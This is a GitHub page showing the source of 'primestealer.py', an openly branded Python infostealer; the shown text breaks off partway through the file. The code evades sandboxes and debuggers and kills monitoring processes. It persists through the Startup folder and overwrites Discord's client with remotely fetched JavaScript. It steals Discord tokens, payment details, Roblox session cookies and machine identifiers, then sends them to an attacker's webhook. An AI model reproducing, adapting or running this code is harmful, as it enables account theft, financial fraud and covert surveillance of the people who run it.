-
Notifications
You must be signed in to change notification settings - Fork 4
/
primestealer.py
1346 lines (1177 loc) · 55.7 KB
/
primestealer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
from discord_webhook import DiscordEmbed, DiscordWebhook
import browser_cookie3
import os,psutil,threading
import subprocess
import os
import winreg
import psutil
import platform
import requests
import browser_cookie3
import getmac
import ssl
import socket
import OpenSSL
import threading
import difflib
import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from discord import Embed, File, SyncWebhook
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from tokenize import Token
from urllib.request import Request, urlopen
from json import loads, dumps
import time
import shutil
from zipfile import ZipFile
import random
import re
import sys
import wmi
import subprocess
import uuid
import socket
import getpass
def user_check():
USERS = [
"Primelus",
]
try:
USER = os.getlogin()
if USER in USERS:
os.exit(1)
except:
pass
def registry_check():
reg1 = os.system(
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul"
)
reg2 = os.system(
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul"
)
if reg1 != 1 and reg2 != 1:
os.exit(1)
handle = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"
)
try:
reg_val = winreg.QueryValueEx(handle, "0")[0]
if ("VMware" or "VBOX") in reg_val:
os.exit(1)
finally:
winreg.CloseKey(handle)
def process_check():
while True:
PROCESSES = [
"http toolkit.exe",
"httpdebuggerui.exe",
"wireshark.exe",
"fiddler.exe",
"charles.exe",
"regedit.exe",
"cmd.exe",
"taskmgr.exe",
"vboxservice.exe",
"df5serv.exe",
"processhacker.exe",
"vboxtray.exe",
"vmtoolsd.exe",
"vmwaretray.exe",
"ida64.exe",
"ollydbg.exe",
"pestudio.exe",
"vmwareuser",
"vgauthservice.exe",
"vmacthlp.exe",
"x96dbg.exe",
"vmsrvc.exe",
"x32dbg.exe",
"vmusrvc.exe",
"prl_cc.exe",
"prl_tools.exe",
"qemu-ga.exe",
"joeboxcontrol.exe",
"ksdumperclient.exe",
"ksdumper.exe",
"joeboxserver.exe",
"xenservice.exe",
]
for proc in psutil.process_iter():
if any(procstr in proc.name().lower() for procstr in PROCESSES):
try:
proc.kill()
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass
def hwid_check():
HWIDS = [
"7AB5C494-39F5-4941-9163-47F54D6D5016",
]
try:
HWID = (
subprocess.check_output(
r"wmic csproduct get uuid", creationflags=0x08000000
)
.decode()
.split("\n")[1]
.strip()
)
if HWID in HWIDS:
os.exit(1)
except Exception:
pass
def ip_check():
try:
IPS = [
"None",
]
IP = requests.get("https://api.myip.com").json()["ip"]
if IP in IPS:
os.exit(1)
except:
pass
def registry_check():
reg1 = os.system(
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul"
)
reg2 = os.system(
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul"
)
if reg1 != 1 and reg2 != 1:
os.exit(1)
handle = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"
)
try:
reg_val = winreg.QueryValueEx(handle, "0")[0]
if ("VMware" or "VBOX") in reg_val:
os.exit(1)
finally:
winreg.CloseKey(handle)
def dll_check():
vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")
if os.path.exists(vmware_dll):
os.exit(1)
if os.path.exists(virtualbox_dll):
os.exit(1)
def specs_check():
try:
RAM = str(psutil.virtual_memory()[0] / 1024**3).split(".")[0]
DISK = str(psutil.disk_usage("/")[0] / 1024**3).split(".")[0]
if int(RAM) <= 2:
os.exit(1)
if int(DISK) <= 50:
os.exit(1)
if int(psutil.cpu_count()) <= 1:
os.exit(1)
except:
pass
def proc_check():
processes = ["VMwareService.exe", "VMwareTray.exe"]
for proc in psutil.process_iter():
for program in processes:
if proc.name() == program:
os.exit(1)
def mac_check():
try:
MACS = [
"00:03:47:63:8b:de",
]
MAC = str(getmac.get_mac_address())
if MAC in MACS:
os.exit(1)
except:
pass
hook = "YOUR WEBHOOK HERE"
inj3c710n_url = "https://raw.githubusercontent.com/SheLuvDx/index/main/injection.js"
color = 0x00000000
DETECTED = False
def g371P():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"]
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def g37D474(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return g37D474(blob_out)
def D3CrYP7V41U3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04Dr3QU3575(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413: # 413 = DATA TO BIG
return r
except:
pass
def L04DUr118(hook, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(hook, data=data, headers=headers))
return r
else:
r = urlopen(Request(hook, data=data))
return r
except:
pass
def g108411NF0():
ip = g371P()
username = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
g108411NF0 = f":flag_{contryCode}: - `{username.upper()} | {ip} ({contry})`"
# print(globalinfo)
return g108411NF0
def TrU57(C00K13s):
# simple Trust Factor system
global DETECTED
data = str(C00K13s)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def inj3c710n():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
injeCTmED0cT0r_cont = requests.get(inj3c710n_url).text
injeCTmED0cT0r_cont = injeCTmED0cT0r_cont.replace("%WEBHOOK%", hook)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(injeCTmED0cT0r_cont)
inj3c710n()
def G37UHQFr13ND5(token):
badgeList = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<a:developer:1095726251001520252> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<a:bughunter2:1095726038031548456> "},
{"Name": 'Active_Developer', 'Value': 4194304, 'Emoji': "<a:activedev:1095725933236858991> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early:1095728685144870922> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<a:squad:1095728662386577438> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<a:squad:1095728662386577438> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<a:squad:1095728662386577438> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<a:bughunter:1095725763006844948> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<a:hypesquad:1095730117327724626> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<a:partner:1095725986731004005> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<a:staff:1095725959627427861> "}
]
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
OwnedBadges = ''
flags = friend['user']['public_flags']
for badge in badgeList:
if flags // badge["Value"] != 0 and friend['type'] == 1:
if not "House" in badge["Name"]:
OwnedBadges += badge["Emoji"]
flags = flags % badge["Value"]
if OwnedBadges != '':
uhqlist += f"{OwnedBadges} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
def G3781111N6(token):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
billingjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if billingjson == []: return " -"
billing = ""
for methode in billingjson:
if methode["invalid"] == False:
if methode["type"] == 1:
billing += ":credit_card:"
elif methode["type"] == 2:
billing += ":parking: "
return billing
def G3784D63(flags):
if flags == 0: return ''
OwnedBadges = ''
badgeList = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "developer:1095726251001520252> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<a:bughunter2:1095726038031548456> "},
{"Name": 'Active_Developer', 'Value': 4194304, 'Emoji': "<a:activedev:1095725933236858991> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early:1095728685144870922> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<a:squad:1095728662386577438> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<a:squad:1095728662386577438> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<a:squad:1095728662386577438> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<a:bughunter:1095725763006844948> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<a:hypesquad:1095730117327724626> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<a:partner:1095725986731004005> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<a:staff:1095725959627427861> "}
]
for badge in badgeList:
if flags // badge["Value"] != 0:
OwnedBadges += badge["Emoji"]
flags = flags % badge["Value"]
return OwnedBadges
def G3770K3N1NF0(token):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
userjson = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
username = userjson["username"]
hashtag = userjson["discriminator"]
email = userjson["email"]
idd = userjson["id"]
pfp = userjson["avatar"]
flags = userjson["public_flags"]
nitro = ""
phone = "-"
if "premium_type" in userjson:
nitrot = userjson["premium_type"]
if nitrot == 1:
nitro = "<a:subscriber:1095725882250895481> "
elif nitrot == 2:
nitro = "<a:boost:1095740247540776991> <a:subscriber:1095725882250895481> "
if "phone" in userjson: phone = f'`{userjson["phone"]}`'
return username, hashtag, email, idd, pfp, flags, nitro, phone
def CH3CK70K3N(token):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def UP104D70K3N(token, path):
global hook
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
username, hashtag, email, idd, pfp, flags, nitro, phone = G3770K3N1NF0(token)
if pfp == None:
pfp = "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
billing = G3781111N6(token)
badge = G3784D63(flags)
friends = G37UHQFr13ND5(token)
if friends == '': friends = "No HQ Friends"
if not billing:
badge, phone, billing = "🔒", "🔒", "🔒"
if nitro == '' and badge == '': nitro = " -"
data = {
"content": f'{g108411NF0()} | Found in `{path}`',
"embeds": [
{
"color": color,
"fields": [
{
"name": "<:blackkeyicon7:1221556971636002826> Token:",
"value": f"`{token}`\n[Click To Copy](https://superfurrycdn.nl/copy/{token})"
},
{
"name": "<:mail:1095741024678191114> Email:",
"value": f"`{email}`",
"inline": True
},
{
"name": "<:phone:1095741029832990720> Phone:",
"value": f"{phone}",
"inline": True
},
{
"name": "<a:blackworld:1095741984385290310> IP:",
"value": f"`{g371P()}`",
"inline": True
},
{
"name": "<a:black_hypesquad:1095742323423453224> Badges:",
"value": f"{nitro}{badge}",
"inline": True
},
{
"name": "<a:blackmoneycard:1095741026850852965> Billing:",
"value": f"{billing}",
"inline": True
},
{
"name": "<:friends:1221597711883829419> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{username}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"username": "Prime Stealer | t.me/PrimeStealer",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
class PcInfo:
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
def __init__(self):
self.get_inf(hook)
def get_inf(self, webhook):
webhook = SyncWebhook.from_url(webhook, session=requests.Session())
computer_os = platform.platform()
mac = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
username = os.getenv("UserName")
hostname = os.getenv("COMPUTERNAME")
hwid = subprocess.check_output('C:\Windows\System32\wbem\WMIC.exe csproduct get uuid', shell=True,
stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
cpu = wmi.WMI().Win32_Processor()[0]
gpu = wmi.WMI().Win32_VideoController()[0]
ram = round(float(wmi.WMI().Win32_OperatingSystem()[0].TotalVisibleMemorySize) / 1048576, 0)
ip = requests.get('https://api.ipify.org').text
data = {
"content": g108411NF0(),
"embeds": [
{
"title": "Prime Stealer | System Info",
"description": f"<:userr:1164196007626670170> **PC Username:** `{username}`\n<:windowss:1164191405615362098> **PC Name:** `{hostname}`\n<:computerr:1164189052472393798> **OS:** `{computer_os}`\n\n<:blackworld:1164189050983415889> **IP:** `{ip}`\n<:wrenchh:1164189063306293358> **MAC:** `{mac}`\n<:keyy:1164192530456383529> **HWID:** `{hwid}`\n\n<:cpu:1164189055261605919> **CPU:** `{cpu.Name}`\n<:gpu:1164189947700453396> **GPU:** `{gpu.Name}`\n<:ramm:1164189059955036320> **RAM:** `{ram}GB`",
"color": color,
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
}
}
],
"username": "Prime Stealer | t.me/PrimeStealer",
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
def edge_logger():
try:
rcookies = browser_cookie3.edge(domain_name='roblox.com')
rcookies = str(rcookies)
rcookie = rcookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
return rcookie
except Exception as e:
print(f"Error occurred in edge_logger: {str(e)}")
return None
def chrome_logger():
try:
rcookies = browser_cookie3.chrome(domain_name='roblox.com')
rcookies = str(rcookies)
rcookie = rcookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
return rcookie
except Exception as e:
print(f"Error occurred in chrome_logger: {str(e)}")
return None
def firefox_logger():
try:
rcookies = browser_cookie3.firefox(domain_name='roblox.com')
rcookies = str(rcookies)
rcookie = rcookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
return rcookie
except Exception as e:
print(f"Error occurred in firefox_logger: {str(e)}")
return None
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
return cookie
except Exception as e:
print(f"Error occurred in opera_logger: {str(e)}")
return None
def operagx_logger():
try:
rcookies = browser_cookie3.opera_gx(domain_name='roblox.com')
rcookies = str(rcookies)
rcookie = rcookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
return rcookie
except Exception as e:
print(f"Error occurred in operagx_logger: {str(e)}")
return None
def chromium_logger():
try:
rcookies = browser_cookie3.chromium(domain_name='roblox.com')
rcookies = str(rcookies)
rcookie = rcookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
return rcookie
except Exception as e:
print(f"Error occurred in chromium_logger: {str(e)}")
return None
roblochrome,robloedge,roblofire,robloopera,roblogx,roblochromium=chrome_logger(),edge_logger(),firefox_logger(),opera_logger(),operagx_logger(),chromium_logger()
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": g108411NF0(),
"embeds": [
{
"title": "Prime Stealer | Roblox Information",
"description": f'Opera:```{robloopera}```\nChrome:```{roblochrome}```\nEdge:```{robloedge}```\nFirefox:```{roblofire}```\nOperaGX:```{roblogx}```\nChromium:```{roblochromium}```',
"color": color,
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
}
}
],
"username": "Prime Stealer | t.me/PrimeStealer",
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
def R3F0rM47(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def UP104D(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "pcook":
rb = ' | '.join(da for da in c00K1W0rDs)
if len(rb) > 1000:
rrrrr = R3F0rM47(str(c00K1W0rDs))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": g108411NF0(),
"embeds": [
{
"title": "Prime Stealer | Cookies",
"description": f"**Found**:\n{rb}\n\n**Data:**\n <:blackmember:1095740314683179139> • **{C00K1C0UNt}** Cookies Found \n <:blackarrow:1095740975197995041> • [PrimeCookies.txt]({link})",
"color": color,
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
}
}
],
"username": "Prime Stealer | t.me/PrimeStealer",
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
return
if name == "ppassw":
ra = ' | '.join(da for da in p45WW0rDs)
if len(ra) > 1000:
rrr = R3F0rM47(str(p45WW0rDs))
ra = ' | '.join(da for da in rrr)
data = {
"content": g108411NF0(),
"embeds": [
{
"title": "Prime Stealer | Passwords",
"description": f"**Found**:\n{ra}\n\n**Data:**\n <:blacklock:1095741022065131571> • **{P455WC0UNt}** Passwords Found\n <:blackarrow:1095740975197995041> • [PrimePasswords.txt]({link})",
"color": color,
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
}
}
],
"username": "Prime Stealer | t.me/PrimeStealer",
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": g108411NF0(),
"embeds": [
{
"color": color,
"fields": [
{
"name": "I Found These Files",
"value": link
}
],
"author": {
"name": "Prime Stealer | Files"
},
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
}
}
],
"username": "Prime Stealer | t.me/PrimeStealer",
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
return
def wr173F0rF113(data, name):
path = os.getenv("TEMP") + f"\p{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--PrimeStealer-->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0K3Ns = ''
